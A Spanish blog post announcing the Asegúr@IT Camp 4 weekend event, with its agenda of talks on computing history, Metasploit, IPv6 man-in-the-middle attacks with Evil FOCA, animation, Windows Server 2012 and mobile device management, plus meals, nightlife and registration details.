A la mañana del sábado tendremos un reconfortante desayuno, junto con una batida por las cabañas donde iré despertando personalmente a todos los que se encuentren en posición de remoloneo, para que no se pierdan las viandas y ninguna de la charlas, que durarán todo el día.

Las charlas comenzarán pronto, y acabarán a las 7 de la tarde, más o menos, y aunque aún es posible que haya algún cambio, tendremos una buena lista de actividades. Como cierre del evento he dejado a mis amigos de Cyberhades, que están trabajando en un libro sobre anécdotas de la historia, donde nos contarán aventuras de la historia de la informática en una charla que hemos titulado "Gangs of Computing: La informática se creo en las calles", porque esos multimillonarios hombres de negocio un día fueron más "humanos".

Por supuesto, también tendremos seguridad informática y hacking, así que hemos preparado dos charlas que daremos Pablo y yo sobre: Metasploit para Pentesters y Ataques Man in the Middle en redes IPv6 que daremos con la Evil FOCA, que será entregada a todos los asistentes en un Pendrive de Cálico Electrónico.

Además de estas charlas, tendremos un par de charlas lúdicas para los amantes de los comics y el arte digital, ya que tendremos el estreno del Capítulo 4 de la Temporada 4 de Cálico Electrónico. Este capítulo se presentará antes en una convención de Comics, pero no saldrá online hasta después del Asegúr@IT Camp, ya que esta vez el capítulo tendrá mucho que ver con él.... Por supuesto, vendra Nikotxan a presentarlo, ya que es el artista, y a todos los asistentes que se lo pidáis (antes de que llegue la cena que luego se tuerce) os hará un dibujo dedicado, que siempre se porta como un campeón. 

Los que queráis aprender a animar en serio, podréis apuntaros al Curso de Animación de Cálico Electrónico que dará los días 25 y 26 de Octubre, donde las demos se harán con los archivos originales de Cálico Electrónico, es decir, moveras a los personajes tal y como los mueve Niko, para que las prácticas sean totalmente reales.

La parte de arte digital se completará con la presencia de Rafater, uno de los dibujantes en digital más impactante, que vendrá a enseñarnos cómo se dibuja por computadora, y que además nos sorprenderá con yo que se qué, ya que Rafater además de ser un dibujante increíble, es un showman en toda la extensión del término. Lo tendremos allá gracias a la Ediciones Babylon.

El el Asegúr@IT Camp 4, también habrá un hueco para Windows 8 y Windows Server 2012, pues como ya sabéis justo esa semana será el lanzamiento oficial de la nueva version de escritorio y tabletas de Windows, por lo que ya puedes ir descargándote la versión final de Windows Server 2012 para probarla. Microsoft participará con una charla en el camp, así que les podrás preguntar todo lo que siempre has querido y nunca te has atrevido.

Como los dispositivos móviles están en auge, queremos hablaros también de dos soluciones de gestión de los mismos, es decir, de Mobile Device Management, en este caso tendremos por el momento una charla para dispositivos Apple y otra para dispositivos Android por parte de ESET, que seguro que a más de un administrador o IT Pro os vendrá genial.

La agenda aún puede tener alguna sorpresa más, pero creemos que la jornada de trabajo ya es demasiado dura, por lo que tendremos un buen rancho que deglutieremos todos juntos, y una cena el sábado que suele ser lo mejor del Asegúr@IT Camp.

Luego llegará la noche, y nos iremos a tomar un "algo" a la disco, donde machacaré a todo el que se ponga por delante en el futbolín Internacional, mientras que los más rumbosos bailan y los más habilidosos juegan al billar, y los otros... bueno, los otros hacen lo que se hace en estos sitios: charlar y tomar copichuelas.

A una hora decente tiraré la bomba ninja y desapareceré de allí para ser el primero en el desayuno del domingo y encargarme de que nadie se quede durmiendo en las cabañas más alla de la hora de partida, que ya me conozco yo a los más jóvenes y rumbosos de la noche anterior.

El evento tiene diferentes franjas de registro, y los que se han apuntado ya o lo hagan antes del 30 de Septiembre, tendrán el mejor descuento, así que no lo dejes pasar más y apúntate cuanto antes. Por supuesto, el número de cabañas es limitado así que se asignarán por orden de reserva, por lo que cuanto antes te apuntes mejor para tí.

Para los que vengáis de fuera, la gente de Eventos Creativos se ocupará de daros apoyo logístico, informándoos de cómo llegar, de cuál es la mejor, opción, etc...  Tienes toda la información del proceso de registro en la web del Asegúr@IT Camp 4. ¡Nos vemos en los árboles!

Saludos Malignos!

PD: Aprovecho para recordaros que la semana que viene se imparten el Curso de Administración de  Windows Server 2012 para IT Pros y el Curso de Desarrollo de Aplicaciones iOS para iPhone & iPad.